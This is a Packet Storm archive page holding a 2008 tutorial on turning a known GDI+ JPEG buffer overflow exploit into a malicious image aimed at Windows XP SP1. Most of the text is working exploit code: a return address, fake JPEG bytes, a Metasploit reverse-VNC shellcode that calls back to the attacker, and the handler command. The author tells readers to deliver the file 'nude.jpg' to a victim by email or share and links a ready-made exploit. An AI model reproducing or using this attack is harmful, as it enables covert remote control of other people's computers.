exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IntroToBufferOverflows.txt

IntroToBufferOverflows.txt
Posted Apr 1, 2008
Authored by IMC Tullywacker | Site Insanemasterminds.com

Intro to Buffer Overflows - A whitepaper demonstrating a buffer overflow on a Windows XP SP1 box using Backtrack 3 Beta.

tags | paper, overflow
systems | windows
SHA-256 | 7eee601d3a61af58f41eee3b233daabac27cbb59bda1011826f01dafdda38592

IntroToBufferOverflows.txt

Change Mirror Download
Intro to Buffer Overflows 
By IMC Tullywacker

Shouts
IMC GrahamPhisher
IMC EXE
IMC TwiZted
IMC PhirePhreak

Insanemasterminds.com
GrahamPhisher.com
remote-exploit.org


Hello, today I am going to be showing you how to perform a buffer overflow on a windows xp sp1 box. I
am going to be using Backtrack 3 beta as should you to be able to follow along easily.

If you are unfamiliar with buffer overflows I suggest you read up on them before proceeding to the tutorial.
http://en.wikipedia.org/wiki/Buffer_overflow

Ok lets begin, fire up backtrack.

Open up a new terminal.

Code:

cd /pentest/exploits/milw0rm


ok now lets search the sploitlist for GDI exploits

Code:

cat sploitlist.txt |grep -i GDI


ok now copy the 475.sh sploit to the /tmp/ directory

Code:

cp ./platforms/windows/remote/475.sh /tmp/


now lets edit the file to better suit our needs.

Code:

nano /tmp/475.sh


We need to edit the address of the shellcode for a windows xp sp1 english so comment the 1st line and uncomment the
2nd like so

Code:

#********************************************
#Address of shellcode
#********************************************
#printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0


Next there are formatting problems in the image junk section that need to be corrected

Code:

#********************************************
#Image junk here...fake JPG
#********************************************
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";


Now lets edit the shellcode area we need to replace \xCC with a NOP (\x90) and fix another formatting issue

Code:

#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\x90\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it works!


Ok next fix yet another formatting issue

Code:

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************


Now the original purpose for this exploit is to add an administrator to the users group as you can see from the line
above. We are going to be using a reverse vnc connection because a nice GUI is always the most fun.

You can do it if you want just to see that the sploit works, but here at IMC we strive to do shit differently Smiley

Now cd the framework2 directory

Code:

cd /pentest/exploits/framework2


To view all the payloads type

Code:

../msfpayload


We're going to use the win32_reverse_vncinject payload

Now to see what variables are needed to be set we type

Code:

../msfpayload win32_reverse_vncinject


As you can see the only field left blank is the LHOST option so we need our lan ip address

Code:

ifconfig


Code:

inet addr:192.168.1.113


Now we need to get our custom payload and put it into our sploit

Code:

../msfpayload win32_reverse_vncinject LHOST=192.168.1.113 P


This will return the payload that is suited for our needs.

Here's mine

Code:

"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
"\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
"\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
"\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";


So copy your payload and now lets put it in our sploit

Code:

nano /tmp/475.sh


Code:

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
printf "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
printf "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
printf "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
printf "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
printf "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
printf "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
printf "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
printf "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
printf "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
printf "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
printf "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
printf "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
printf "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
printf "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
printf "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
printf "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
printf "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";


Now we need to set up our payload handler

Code:

../msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=192.168.1.102


Now you need to make your sploit into a .jpg file

Code:

cd /tmp/


Code:

chmod +x 475.sh


Code:

../475.sh > nude.jpg


Now what your going to do is give the victim the file, email, share, whatever up to u.

All you have to do now is sit and wait for the victim to open a folder containing the malicious .jpg file, they
dont even have to open it! This will spawn a vnc session and give you a gui of the computer.

Congrats on making your 1st malicious jpg file.

For all you lazy people ive uploaded the modified sploit all you have to do is change the payload

Code:

http://imctully.hostaim.com/maliciousjpg.txt


~Tully
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close